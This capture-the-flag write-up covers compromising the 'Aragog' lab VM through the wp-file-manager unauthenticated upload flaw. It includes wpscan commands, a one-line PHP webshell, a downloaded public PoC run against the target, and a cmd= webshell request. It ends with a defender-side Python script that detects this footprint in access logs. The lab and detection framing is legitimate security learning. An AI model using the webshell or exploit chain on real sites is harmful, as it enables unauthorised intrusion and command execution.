Aragog

Aragog is the 1st VM of the 3-box HarryPotter VM series; the goal is to find the 2 horcruxes hidden inside the machine.

An nmap scan reveals two open ports: 22 and 80.

Gobuster reveals a WordPress blog under /blog.

// wpscan: basic enumeration of the blog
wpscan --url http://192.168.1.101/blog

// wpscan: aggressive plugin detection, with an API token so known plugin vulnerabilities are reported
wpscan --api-token=$WPSCAN_KEY --url=http://1.2.3.4/blog -e p --plugins-detection aggressive

The important keywords are highlighted on the blog, so we can guess that a vulnerable plugin is in play. Since the site runs WordPress, we use wpscan to dig deeper. Make sure you have a wpscan API token; without it, wpscan lists the plugins it finds but does not flag which of them have known vulnerabilities.

// First tried to attack plugin 1.
// No backup files could be found in the /wp-content/uploads/wp-file-manager-pro/fm_backup directory.
Abandoned this and moved to the next plugin identified by wpscan.

// Arbitrary unauthenticated file upload in wp-file-manager
// Details at the link below:
https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

First create payload.php in the current directory; the PoC script below uploads it to the target:

<?php
system($_GET['cmd']);
?>


// Fetch and run the public PoC against the blog
wget -c "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py"
python3 2020-wp-file-manager-v67.py http://wordpress.aragog.hogwarts/blog

// The uploaded file lands in the plugin's lib/files directory; confirm code execution:
http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php?cmd=pwd

Next, upload a PHP reverse shell to get an interactive session on the box.
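As an added defender-side example (not part of the original writeup), here is a small check for the footprint this exploit chain leaves in the web server access log: a PHP script executed out of the plugin's lib/files directory, and a cmd= parameter sent to a script under wp-content. The log lines are constructed, and the file extension list is an assumption about what the server would execute.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The plugin serves user-managed files from this directory (where the PoC above
# lands payload.php); a script executing from it is a strong webshell signal.
SUSPECT_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")  # assumed executable extensions

# Constructed sample traffic, not a capture from the box.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /blog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /blog/wp-content/plugins/wp-file-manager/css/style.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /blog/wp-content/plugins/wp-file-manager/lib/files/payload.php?cmd=pwd HTTP/1.1" 200 27 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /blog/wp-content/plugins/wp-file-manager/lib/files/notes.txt HTTP/1.1" 200 140 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return the list of findings for one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    findings = []
    # A plain file (notes.txt) in lib/files is normal use; a script there is not.
    if SUSPECT_DIR in path and path.endswith(SCRIPT_EXT):
        findings.append("script executed from wp-file-manager lib/files")
    cmd = parse_qs(url.query).get("cmd")
    if cmd and "/wp-content/" in path:
        findings.append("cmd= parameter sent to a wp-content script: %r" % cmd[0])
    return findings

def scan(log_text):
    """Run classify() over every line; return (ip, path, findings) for each hit."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), urlsplit(m.group("target")).path, findings))
    return hits

if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, path, "; ".join(findings))
```

On a real box the same check can be fed `/var/log/apache2/access.log`, and a file-integrity scan of the lib/files directory for script extensions gives the same signal from the filesystem side.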
